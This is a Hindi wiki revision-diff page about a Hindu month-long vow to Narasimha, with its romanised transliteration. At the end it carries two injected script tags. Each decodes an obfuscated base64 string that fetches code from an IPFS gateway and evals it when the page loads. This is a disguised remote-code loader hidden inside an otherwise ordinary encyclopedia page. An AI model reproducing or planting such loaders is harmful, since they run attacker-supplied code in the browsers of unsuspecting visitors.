Difference between revisions of "बुद्ध्यवाप्ति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*यह व्रत [[चैत्र]] [[पूर्णिमा]] के उपरान्त आरम्भ होती है।  
 
*यह व्रत [[चैत्र]] [[पूर्णिमा]] के उपरान्त आरम्भ होती है।  
 
*यह व्रत एक [[मास]] किया जाता है।  
 
*यह व्रत एक [[मास]] किया जाता है।  
 
*इस व्रत में [[नृसिंह अवतार|नृसिंह]] की पूजा की जाती हैं,  
 
*इस व्रत में [[नृसिंह अवतार|नृसिंह]] की पूजा की जाती हैं,  
 
*इस व्रत में सरसों से प्रतिदिन होम किया जाता है।  
 
*इस व्रत में सरसों से प्रतिदिन होम किया जाता है।  
*त्रिमधुर (तीन मधुर पदार्थ) से ब्रह्म भोज तथा [[वैशाख]] पूर्णिमा पर सोने का दान करना चाहिए <ref>विष्णुधर्मोत्तरपुराण (3|206|1-5)</ref>।
+
*त्रिमधुर (तीन मधुर पदार्थ) से ब्रह्म भोज तथा [[वैशाख]] पूर्णिमा पर सोने का दान करना चाहिए <ref>विष्णुधर्मोत्तरपुराण (3|206|1-5</ref>।
 
 
 
 
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat chaitr poornima ke uparant arambh hoti hai.
  • yah vrat ek mas kiya jata hai.
  • is vrat mean nrisianh ki pooja ki jati haian,
  • is vrat mean sarasoan se pratidin hom kiya jata hai.
  • trimadhur (tin madhur padarth) se brahm bhoj tatha vaishakh poornima par sone ka dan karana chahie [1].

 



tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|206|1-5

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>